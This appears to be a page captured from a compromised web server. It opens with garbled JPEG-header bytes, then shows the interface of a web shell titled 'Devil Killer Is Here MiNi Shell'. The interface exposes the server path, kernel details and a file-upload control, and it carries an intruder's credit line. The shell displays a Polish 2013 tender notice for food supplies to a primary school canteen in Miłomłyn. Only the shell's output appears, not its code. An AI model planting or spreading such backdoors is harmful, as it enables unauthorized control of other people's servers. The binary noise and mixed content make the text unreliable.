JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130104/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130104/6042-N-2013.html

<p class="kh_header"><b>Miłomłyn: Dostawa artykułów żywnościowych do stołówki szkolnej</b><br>
<b>Numer ogłoszenia: 6042 - 2013; data zamieszczenia: 04.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Publiczna Szkoła Podstawowa w Miłomłynie im. I Dywizji Tadeusza Kościuszki , ul. Pasłęcka 15, 14-140 Miłomłyn, woj. warmińsko-mazurskie, tel. 0-89 641 31 23, 641 31 33.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> spmilomlyn@gmail.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: SZkoła Podstawowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych do stołówki szkolnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa artykułów żywnościowych do stołówki szkolnej na rok 2013.
Szczegółowy opis przedmiotu zamówienia zawarty jest w załączniku nr 8 do SIWZ stanowiącym integralną część niniejszego SIWZ, w którym wskazano asortyment, charakterystykę, parametry zamawianych artykułów oraz przewidywaną maksymalną ich ilość.
W przypadku gdy Zamawiający określił przedmiot zamówienia wskazując producenta, znaki towarowe i pochodzenie, Zamawiający dopuszcza składanie oferty równoważnej zgodnie z zasadami określonymi w art. 30 ust. 5 ustawy Prawo zamówień publicznych. W takim przypadku Wykonawca zobowiązany jest wykazać, iż oferowane przez niego dostawy spełniają wymagania określone przez Zamawiającego. Zamawiający ustala następujące cechy wyrobów równoważnych:
1) gramatura oferowanego towaru równoważnego nie może być niższa niż gramatura towaru wymienionego w szczegółowym opisie przedmiotu zamówienia,
2) oferowane równoważne towary muszą charakteryzować się takimi samymi walorami organoleptycznymi (konsystencja, zapach, barwa), estetycznymi i smakowymi oraz muszą zawierać w swoim składzie te same surowce użyte do ich produkcji co towary wymienione jako przykładowe wskazane w załączniku nr 8 do SIWZ.
3) w przypadkach zaoferowania towarów równoważnych Wykonawca zobowiązany jest wskazać nazwę producenta, typ, właściwości i parametry oferowanych towarów. 
Zamawiający powiadomi telefonicznie Wykonawcę o każdej dostawie oraz wskaże zamawiane towary z podaniem ilości. Wykonawca zobowiązuje się wykonać przedmiot dostawy w ciągu 24 godzin od dnia otrzymania informacji.
Dostawy będą realizowane:
1) część 1 - Dostawa artykułów spożywczych i produktów mleczarskich - średnio 2 razy w
tygodniu;
2) część 2 - Dostawa mięsa - średnio 3-4 razy w tygodniu;
3) część 3 - Dostawa pieczywa - średnio3 razy w tygodniu;
4) część 4 - Dostawa warzyw i owoców - średnio 2 razy w tygodniu.
3.6 Produkty muszą spełniać normy jakościowe oraz muszą być dostarczone w ich początkowym okresie gwarancji w oryginalnym opakowaniu.
Wykonawca powinien zachować odpowiednie warunki  transportu i przechowywania dostarczanego towaru. Każda dostawa towaru wymagającego załączenia handlowego dokumentu identyfikacyjnego musi posiadać taki dokument. 
 Zamawiający zastrzega sobie prawo do zmniejszenia lub zwiększenia ilości zamawianych towarów (-/+ 20%) w stosunku do szacowanej ilości potrzeb.
Wykonawca ma obowiązek rozpatrzenia reklamacji jakości i ilości dostarczanego towaru. W przypadku zasadności reklamacji Wykonawca zobowiązuje się dostarczyć Zamawiającemu towar wolny od wad w dniu złożenia reklamacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.84.20.00-2, 15.33.11.70-9, 03.14.25.00-3, 15.50.00.00-3, 15.10.00.00-9, 15.81.00.00-9, 03.22.23.00-6, 03.22.21.10-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wpłaty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek ten zostanie spełniony, gdy Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu - zgodnie ze wzorem stanowiącym załącznik Nr 1 do SIWZ.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. 
Zamawiający uzna, że warunek ten zostanie spełniony, gdy Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu - zgodnie ze wzorem stanowiącym załącznik Nr 1 do SIWZ.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia. 
Zamawiający uzna, że warunek ten zostanie spełniony, gdy Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu - zgodnie ze wzorem stanowiącym załącznik Nr 1 do SIWZ.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia. 
Zamawiający uzna, że warunek ten zostanie spełniony, gdy Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu - zgodnie ze wzorem stanowiącym załącznik Nr 1 do SIWZ.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. 
Zamawiający uzna, że warunek ten zostanie spełniony, gdy Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu - zgodnie ze wzorem stanowiącym załącznik Nr 1 do SIWZ.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo, jeżeli Wykonawcę reprezentuje pełnomocnik. Pełnomocnictwo powinno być złożone w oryginale lub w formie kopii poświadczonej za zgodność z oryginałem przez notariusza; Formularz oferty - zał. nr 6 do SIWZ; Wykaz usług- zał. nr 4 do SIWZ; Oświadczenie wykonawców wspólnie ubiegających się o przyznanie zamówienia- zał. nr 5 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana ceny dostarczanych artykułów żywnościowych może nastąpić przy zmianie podatku VAT.
2. Cena warzyw i owoców  będzie ustalana dla każdorazowego zamówienia w ten sposób, że do maksymalnej ceny giełdowej brutto notowanej na Bronisze-Warszawki Rolno-Spożywczy Rynek Hurtowy - publikowanej na stronie internetowej www.bronisze.com.pl w dniu złożenia zamówienia dodawana będzie marża handlowa określona przez Wykonawcę w formularzu ofertowym. 
Aktualizacja cen jednostkowych brutto nie wymaga pisemnej zgody Zamawiającego;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spmilomlyn.edupage.org/; www.bip.milomlyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Publiczna Szkoła Podstawowa w Miłomłynie, im. I Dywizji Tadeusza Kościuszki , ul. Pasłęcka 15, 14-140 Miłomłyn - sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.01.2013 godzina 08:30, miejsce: Publiczna Szkoła Podstawowa w Miłomłynie, im. I Dywizji Tadeusza Kościuszki , ul. Pasłęcka 15, 14-140 Miłomłyn - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa artykułów spożywczych i produktów mleczarskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Jaja świeże Duże10 szt. Szt.7200
2.Mąka pszenna Tortowa Płońska typ 450 lub równoważna 1kg, Kg 1000
3.Cukier  1kg, Kg 400
4.Sól Jodowana 1kg, Kg 250
5.Kasza jęczmienna, Średnia 0,5 kg, Szt. 40
6.Makaron świderki Lubella lub równoważny, 0,5 kg, Szt 800
7.Makaron nitki Lubella lub równoważny 0,5kg, Szt. 220
8.Makaron-zacierka Babuni Lub równoważny 250g, Szt.110
9.Ryż biały długoziarnisty 1kg, Kg 110
10.Olej Kujawski lub równoważny 3l, Szt.320
11. Groszek Konserwowy Bonduelle lub równoważny 400g, Szt.150
12.Syrop zagęszczony Herbapol lub równoważny 5l, Szt.250
13.Koncentrat Pomidorowy 30 % Pudliszki lub równoważny1 kg, Szt.60
14.Ketchup łagodnyDawton lub równoważny 500g, Szt. 200
15.Musztarda sarepska Octim lub równoważna 500g, Szt.20
16.Majonez Kętrzyński lub równoważny 815g, Szt.50
17.Magi przyprawa w płynie do zup, sosów, potraw mięsnych i warzywnych
Winiary lub równoważny 960g, Szt.10
18.Sok owocowy Kubuś  lub równoważny0,33l, Szt.1200
19.Filet ShP - ryba mrożona Mintaj Luz, Kg 200
20.Filet ShP - ryba mrożona Miruna Luz, Kg 200
21.Chrzan tarty Octim lub równoważny 160g, Szt. 90
22.Pieprz czarny mielony Cykoria lub równoważny 20g, Szt.100
23.Truskawka Mrożona 5kg, Szt 30
24. Fasola Jaś 5kg , Szt 15
25.Groch Połówki 5kg, Szt 9
26.Ogórek konserwowy Pomorski 870g, Szt 200
27.Dżemy owocowe wiśnia, truskawka Łowicz lub równoważny 280 g, Szt.150
28.Drożdże 100g, Szt.280
29.Przyprawa do potraw Vegeta lub równoważny 200g, Szt.280
30.Kwasek cytrynowy Emix lub równoważny 20g, Szt.100
31.Ziele angielskie Cykoria lub równoważny 20g, Szt.70
32.Liść laurowy Cykoria lub równoważny12g, Szt.70
33.Pietruszka suszona Cykoria lub równoważny 10g, Szt.100
34.Cynamon Cykoria lub równoważny 20g, szt.60
35.Majeranek Cykoria lub równoważny 20g; Szt.40
36.Żurek Winiary lub równowazny 49g; Szt.600
37.Kisiel Cykoria lub równoważny 40g; Szt.1000
38.Bułka tarta 0,5kg; Szt.300
39.Kukurydza Pudliszki lub równoważny 400g; Szt.150
40.Pierogi z truskawkami Mrożone 2,5kg; Szt.120
41.Pierogi z mięsem Mrożone 2,5 kg; Szt.88
42.Mieszanka warzywna 7 -składnikowa Mrożona 2,5 kg;Szt 32
43.Pyzy ziemniaczane Mrożone 5 kg; Szt 60
44.Cukier puder Diamant lub równoważny 0,4 kg; Szt.30
45.Czekolada mleczna Wedel lub równoważny 100 g; Szt.700
46.Czerwona fasola w puszce Pudliszki lub równoważny 400 g; Szt.120
47.Sos sałatkowy Vinegret Knorr lub równoważny 9 g; Szt.400
48.Ptasie mleczko waniliowe Wedel lub równoważny 420 g;Szt.1200
49.Śmietanka kremowa 30% UHT 1l; Szt.600
50.Śmietana 18% BIO lub równoważna 400g; Szt. 1300
51.Mleko 2 % karton Łaciate lub równoważne 1l; Litr 300
52.Ser twarogowy Tłusty Kostka kg 500; 
53.Margaryna zwykła, Kostka 250 g; Szt.200
54.Masło śmietankowe 82% tłuszczu Kostka 200 g.; Szt.200
55.Jogurt owocowy( różne smaki) Jogobella lub równoważny 150g; Szt.3000
56.Jogurt Polski - różne smaki Mlekovita lub równoważny 250g; Szt 700
57.Serek homogenizowany Maluta lub równoważny 150g; Szt 700
58.Ser żółty Edamski lub równoważny Luz; Kg 10
59.Sos do spaghetti Prymat lub równoważny 1 kg; Kg 16
60.Sos boloński Dawton lub równoważny 550g ;szt.150
61Fasola szparagowa żółta mrożona 2,5 kg; kg 150
62Kalafior mrożony 2,5 kg;  Kg 150
63Kasza gryczana5 kg; Kg 100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.84.20.00-2, 15.33.11.70-9, 03.14.25.00-3, 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa mięsa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Karkówka bez kości Luz, Kg 400
2.Schab bez kości Luz, Kg 400
3.Łopatka bez kości  Luz, Kg 600
4.Pachwina bez skóry Luz, Kg 600
5.Boczek wędzony Luz, Kg 90
6.Słonina bez skóry Luz, Kg 120
7.Kiełbasa biała surowa Morliny lub równoważna , Luz, Kg 130
8.Kiełbasa mazurska Morliny lub równoważna Luz, Kg 200
9.Serdelki wieprzowe pyszne  Mazury-Ełk lub równpważne Luz, Kg 100
10.Szynka surowa bez kości Luz, Kg 200
11.Kości wieprzowe Luz, Kg 800
12.Berlinki classic Morliny  lub równoważne Luz, Kg 300

MIĘSO DROBIOWE
14.Udko z kurczaka - udziec Luz , Kg 220
15.Udko z kurczaka - podudzie Luz, Kg 220
16.Filet z kurczaka Luz , Kg 800
17.Korpus z kurczaka Luz, Kg 150
18.Wątróbka z kurczaka Luz, Kg 200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa pieczywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Chleb cały 0,5kg ,Szt.800
2.Chleb krojony 0,5kg, Szt.1200
3.Bułka poznańska 0,80gr., Szt.1300
4.Bułka słodka (z dżemem, z kruszonką, z serem) 0,85gr., Szt.400
5. Pączek ( z dżemem, z budyniem) 0,80gr., Szt.400
6.Bułka kajzerka 0,60gr., Szt.800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa warzyw i owoców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Ziemniaki  Irga lub równoważne 30 k, Kg 9.990
2.Cebula Luz,  Kg 450
3.Marchew Luz ,Kg 900
4.Buraczki czerwone Luz, Kg 600
5.Ogórek kiszony 3kg, Szt.50
6.Pomidor Luz, Kg 200
7.Papryka czerwona Luz, Kg 100
8.Kapusta świeża biała Luz, Kg 750
9.Kapusta pekińska Luz, kg 250
10.Kapusta kiszona 5kg, Szt. 190
11.Cytryna Luz, kg 40
12.Kalafior Luz, Szt 80
13.Por Luz, Kg 200
14.Seler Luz, kg 60
15.Pietruszka Luz, Kg 60
16.Ogórek zielony Luz, Kg 400
17.Jabłka Cortland lub równoważne Luz, Kg 900
18.Jabłka zielone Luz, Kg 200
19.Sałata Luz, Szt 500
20. Banan Luz, Kg 700
21.Pieczarka Luz, Kg 40
22.Truskawka świeża Luz, Kg 80
23.Gruszka Luz, Kg 500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.23.00-6, 03.22.21.10-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com